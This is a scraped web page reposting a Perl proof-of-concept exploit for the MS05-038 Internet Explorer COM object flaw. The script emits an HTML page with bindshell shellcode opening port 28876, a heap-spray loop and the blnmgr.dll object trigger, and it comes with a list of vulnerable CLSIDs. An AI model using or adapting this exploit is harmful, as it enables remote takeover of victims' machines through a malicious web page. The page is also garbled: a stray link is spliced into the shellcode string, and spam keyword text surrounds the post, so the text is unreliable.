• <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>

    <progress id="5koa6"></progress>

  • <strong id="5koa6"></strong>
  • Microsoft Internet Explorer COM Objects Instantiat

    發表于:2007-05-26來源:作者:點擊數: 標簽:
    Microsoft Internet Explorer COM Objects Inst ant iation Exploit (MS05-038) Microsoft Internet Explorer COM Objects Instantiation Exploit (MS05-038) Date : 09/08/2005 Advisory : FrSIRT/ADV-2005-1353 CVE : CAN-2005-1990 Rated as : Critical #
    Microsoft Internet Explorer COM Objects Instantiation Exploit (MS05-038)

    Microsoft Internet Explorer COM Objects Instantiation Exploit (MS05-038)
    Date : 09/08/2005

    Advisory : FrSIRT/ADV-2005-1353
    CVE : CAN-2005-1990
    Rated as : Critical 
    
    #!/usr/bin/perl
    #######################################################
    # 
    # Internet Explorer COM Objects Instantiation Proof of Concept Exploit (MS05-038)
    #
    # Bindshell on port 28876 - Based and ripped from Berend-Jan Wever's IE Exploit
    #
    # Vulnerable Objects :
    # 
    # 3F8A6C33-E0FD-11D0-8A8C-00A0C90C2BC5 (blnmgr.dll) <- Exploited here
    # 860BB310-5D01-11D0-BD3B-00A0C911CE86 (devenum.dll)
    # E0F158E1-CB04-11D0-BD4E-00A0C911CE86 (devenum.dll)
    # 33D9A761-90C8-11D0-BD43-00A0C911CE86 (devenum.dll)
    # 4EFE2452-168A-11D1-BC76-00C04FB9453B (devenum.dll)
    # 33D9A760-90C8-11D0-BD43-00A0C911CE86 (devenum.dll)
    # 33D9A762-90C8-11D0-BD43-00A0C911CE86 (devenum.dll)
    # 083863F1-70DE-11D0-BD40-00A0C911CE86 (devenum.dll)
    # 18AB439E-FCF4-40D4-90DA-F79BAA3B0655 (diactfrm.dll)
    # 31087270-D348-432C-899E-2D2F38FF29A0 (wmm2filt.dll)
    # D2923B86-15F1-46FF-A19A-DE825F919576 (fsusd.dll)
    # FD78D554-4C6E-11D0-970D-00A0C9191601 (dmdskmgr.dll)
    # 52CA3BCF-3B9B-419E-A3D6-5D28C0B0B50C (browsewm.dll)
    # 01E04581-4EEE-11D0-BFE9-00AA005B4383 (browseui.dll)
    # AF604EFE-8897-11D1-B944-00A0C90312E1 (browseui.dll)
    # 7849596A-48EA-486E-8937-A2A3009F31A9 (shell32.dll)
    # FBEB8A05-BEEE-4442-804E-409D6C4515E9 (shell32.dll)
    # 3050F391-98B5-11CF-BB82-00AA00BDCE0B (mshtml.dll)
    # 8EE42293-C315-11D0-8D6F-00A0C9A06E1F (inetcfg.dll)
    # 2A6EB050-7F1C-11CE-BE57-00AA0051FE20 (infosoft.dll)
    # 510A4910-7F1C-11CE-BE57-00AA0051FE20 (infosoft.dll)
    # 6D36CE10-7F1C-11CE-BE57-00AA0051FE20 (infosoft.dll)
    # 860D28D0-8BF4-11CE-BE59-00AA0051FE20 (infosoft.dll)
    # 9478F640-7F1C-11CE-BE57-00AA0051FE20 (infosoft.dll)
    # B0516FF0-7F1C-11CE-BE57-00AA0051FE20 (infosoft.dll)
    # D99F7670-7F1A-11CE-BE57-00AA0051FE20 (infosoft.dll)
    # EEED4C20-7F1B-11CE-BE57-00AA0051FE20 (infosoft.dll)
    # C7B6C04A-CBB5-11D0-BB4C-00C04FC2F410 (query.dll)
    # 85BBD920-42A0-1069-A2E4-08002B30309D (syncui.dll)
    # E846F0A0-D367-11D1-8286-00A0C9231C29 (clbcatex.dll)
    # B4B3AECB-DFD6-11D1-9DAA-00805F85CFE3 (clbcatq.dll)
    # ECABB0BF-7F19-11D2-978E-0000F8757E2A (comsvcs.dll)
    # 466D66FA-9616-11D2-9342-0000F875AE17 (msconf.dll)
    # 67DCC487-AA48-11D1-8F4F-00C04FB611C7 (msdtctm.dll)
    # 00022613-0000-0000-C000-000000000046 (mmsys.cpl
    # D2D588B5-D081-11D0-99E0-00C04FC2F8EC (wmiprov.dll)
    # 5D08B586-343A-11D0-AD46-00C04FD8FDFF (wbemess.dll)
    # CC7BFB42-F175-11D1-A392-00E0291F3959 (qedit.dll)
    # CC7BFB43-F175-11D1-A392-00E0291F3959 (qedit.dll)
    #
    # Tested on : 
    # Internet Explorer 6 on Microsoft Windows XP SP2
    # 
    # Usage : perl MS05-038.pl > mypage.html
    # 
    #######################################################
    #
    # This program is free software; you can redistribute it and/or modify it under
    # the terms of the GNU General Public License version 2, 1991 as published by
    # the Free Software Foundation.
    # 
    # This program is distributed in the hope that it will be useful, but WITHOUT
    # ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
    # FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
    # details.
    # 
    # A copy of the GNU General Public License can be found at:
    # http://www.gnu.org/licenses/gpl.html
    # or you can write to:
    # Free Software Foundation, Inc.
    # 59 Temple Place - Suite 330
    # Boston, MA 02111-1307
    # USA.
    #
    #######################################################
    
    # header
    my $header = "<html><body>\n<SCRIPT language=\"javascript\">\n";
    
    # Win32 bindshell (port 28876) - SkyLined
    my $shellcode = "shellcode = unescape(\"%u4343\"+\"%u4343\"+\"%u43eb".
    "%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea".
    "%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7".
    "%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b".
    "%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64".
    "%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c".
    "%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe".
    "%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0".
    "%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050".
    "%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6".
    "%u50c0%u3550%u0102%uclearcase/" target="_blank" >cc70%uccfe%u8950%u50e0%u106a%u5650".
    "%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa".
    "%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656".
    "%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1".
    "%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353".
    "%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353".
    "%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe".
    "%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff".
    "%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb\");\n";
    
    # Memory 
    my $code = "bigblock = unescape(\"%u0D0D%u0D0D\");\n".
    "headersize = 20;\n".
    "slackspace = headersize+shellcode.length\n".
    "while (bigblock.length<slackspace) bigblock+=bigblock;\n".
    "fillblock = bigblock.substring(0, slackspace);\n".
    "block = bigblock.substring(0, bigblock.length-slackspace);\n".
    "while(block.length+slackspace<0x40000) block = block+block+fillblock;\n".
    "memory = new Array();\n".
    "for (i=0;i<750;i++) memory[i] = block + shellcode;\n".
    "</SCRIPT>\n";
    
    # blnmgr.dll
    my $clsid = '3F8A6C33-E0FD-11D0-8A8C-00A0C90C2BC5'; 
    
    # footer
    my $footer = "<object classid=\"CLSID:".$clsid."\"></object>\n".
    "Microsoft Internet Explorer blnmgr.dll COM Object Remote Exploit\n".
    "</body><script>location.reload();</script></html>";
    
    # print "Content-Type: text/html;\r\n\r\n"; # if you are in cgi-bin
    print "$header $shellcode $code $footer"; 
    

    原文轉自:http://www.kjueaiud.com

    老湿亚洲永久精品ww47香蕉图片_日韩欧美中文字幕北美法律_国产AV永久无码天堂影院_久久婷婷综合色丁香五月

  • <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>

    <progress id="5koa6"></progress>

  • <strong id="5koa6"></strong>